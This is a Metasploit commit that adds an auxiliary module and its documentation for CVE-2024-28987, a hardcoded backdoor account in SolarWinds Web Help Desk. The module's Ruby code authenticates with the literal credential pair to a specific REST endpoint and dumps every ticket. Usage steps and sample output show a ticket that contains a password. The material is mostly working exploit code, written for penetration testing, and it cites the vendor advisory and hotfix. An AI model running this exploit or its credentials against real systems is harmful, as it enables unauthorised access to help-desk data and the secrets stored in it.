Land rapid7#19499, Adds SolarWinds Help Desk Backdoor module

jheysel-r7 · web-flow · commit ea45d8356245 · 2024-10-31T12:17:32.000-04:00
This adds a new module which exploits a backdoor in SolarWinds Web Help Desk (CVE-2024-28987) <= v12.8.3 which enables attackers to retrieve all tickets currently logged in the application.
diff --git a/documentation/modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.md b/documentation/modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.md
@@ -0,0 +1,73 @@
+## Vulnerable Application
+
+This module exploits a backdoor in SolarWinds Web Help Desk <= v12.8.3 (CVE-2024-28987) to retrieve all tickets from the system.
+
+## Testing
+
+The software can be obtained from
+[the vendor](https://downloads.solarwinds.com/solarwinds/Release/WebHelpDesk/12.8.1/WebHelpDesk-12.8.1-x64_eval.exe).
+
+Installation instructions are available [here]
+(https://documentation.solarwinds.com/en/success_center/whd/content/whd_installation_guide.htm).
+
+**Successfully tested on**
+
+- SolarWinds Web Help Desk v12.8.1 on Windows 22H2
+
+## Verification Steps
+
+1. Install and run the application
+2. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use auxiliary/gather/solarwinds_webhelpdesk_backdoor 
+msf6 auxiliary(gather/solarwinds_webhelpdesk_backdoor) > set RHOSTS <IP>
+msf6 auxiliary(gather/solarwinds_webhelpdesk_backdoor) > run
+```
+
+This should return all the tickets from the Web Help Desk platform.
+
+## Options
+
+### TICKET_COUNT
+The number of tickets to dump to the terminal.
+
+## Scenarios
+
+Running the exploit against Web Help Desk v12.8.1 on Windows 22H2 should result in an output similar to the following:
+
+```
+msf6 auxiliary(gather/solarwinds_webhelpdesk_backdoor) > run
+[*] Running module against 192.168.217.145
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Authenticating with the backdoor account "helpdeskIntegrationUser"...
+[+] Successfully authenticated and tickets retrieved. Displaying the first 2 tickets retrieved:
+[+] [
+  {
+    "id": 2,
+    "type": "Ticket",
+    "lastUpdated": "2024-09-25T08:54:13Z",
+    "shortSubject": "Password reset",
+    "shortDetail": "Hi,\r\n\r\nhere is your super secure password: foo\r\n\r\nYour IT Support",
+    "displayClient": "No Client",
+    "updateFlagType": 2,
+    "prettyLastUpdated": "13 hours ago",
+    "latestNote": null
+  },
+  {
+    "id": 1,
+    "type": "Ticket",
+    "lastUpdated": "2024-09-25T05:15:17Z",
+    "shortSubject": "Welcome to Web Help Desk",
+    "shortDetail": "Congratulations! You have successfully installed Web Help Desk. Further configuration options are...",
+    "displayClient": "Demo Client",
+    "updateFlagType": 2,
+    "prettyLastUpdated": "17 hours ago",
+    "latestNote": null
+  }
+]
+[+] Saved 2 tickets to /home/asdf/.msf4/loot/20240926004744_default_unknown_solarwinds_webhe_825328.txt
+[*] Auxiliary module execution completed
+```
diff --git a/modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.rb b/modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.rb
@@ -0,0 +1,100 @@
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  prepend Msf::Exploit::Remote::AutoCheck
+  CheckCode = Exploit::CheckCode
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SolarWinds Web Help Desk Backdoor (CVE-2024-28987)',
+        'Description' => %q{
+          This module exploits a backdoor in SolarWinds Web Help Desk <= v12.8.3 to retrieve all tickets from the system.
+        },
+        'Author' => [
+          'Michael Heinzl', # MSF Module
+          'Zach Hanley' # Discovery & PoC
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-28987'],
+          ['URL', 'https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28987'],
+          ['URL', 'https://support.solarwinds.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2'],
+          ['URL', 'https://www.horizon3.ai/attack-research/cve-2024-28987-solarwinds-web-help-desk-hardcoded-credential-vulnerability-deep-dive/'],
+        ],
+        'DisclosureDate' => '2024-08-22',
+        'DefaultOptions' => {
+          'RPORT' => 8443,
+          'SSL' => 'True'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path for Web Help Desk', '/']),
+        OptInt.new('TICKET_COUNT', [false, 'The number of tickets to dump', 10])
+      ]
+    )
+  end
+
+  def check
+    @auth = auth
+    return CheckCode::Unknown('Target is unreachable') unless @auth
+
+    if @auth.code == 401
+      return CheckCode::Safe
+    elsif @auth.code == 200
+      return CheckCode::Appears
+    end
+
+    CheckCode::Unknown
+  end
+
+  def auth
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets'),
+      'headers' => {
+        'Authorization' => 'Basic ' + Rex::Text.encode_base64('helpdeskIntegrationUser:dev-C4F8025E7')
+      }
+    )
+  end
+
+  def run
+    print_status('Authenticating with the backdoor account "helpdeskIntegrationUser"...')
+    @auth ||= auth
+    fail_with(Failure::Unknown, 'Target is unreachable') unless @auth
+
+    jbody = @auth.get_json_document
+    fail_with(Failure::UnexpectedReply, 'Unexpected Reply: ' + @auth.to_s) unless jbody.any? { |item| item.is_a?(Hash) && item.key?('shortSubject') }
+
+    report_service(
+      host: rhost,
+      port: rport,
+      proto: 'tcp',
+      name: 'SolarWinds Web Help Desk'
+    )
+
+    print_good("Successfully authenticated and tickets retrieved. Displaying the first #{datastore['TICKET_COUNT']} tickets retrieved:")
+    tickets_to_display = jbody.first(datastore['TICKET_COUNT'])
+    print_good(JSON.pretty_generate(tickets_to_display))
+
+    file = store_loot('solarwinds_webhelpdesk.json', 'text/json', datastore['USER'], jbody)
+    print_good("Saved #{jbody.length} tickets to #{file}")
+
+    report_vuln(
+      host: rhost,
+      port: rport,
+      name: name,
+      refs: references,
+      info: 'The backdoor helpdeskIntegrationUser:dev-C4F8025E7 works.'
+    )
+  end
+end
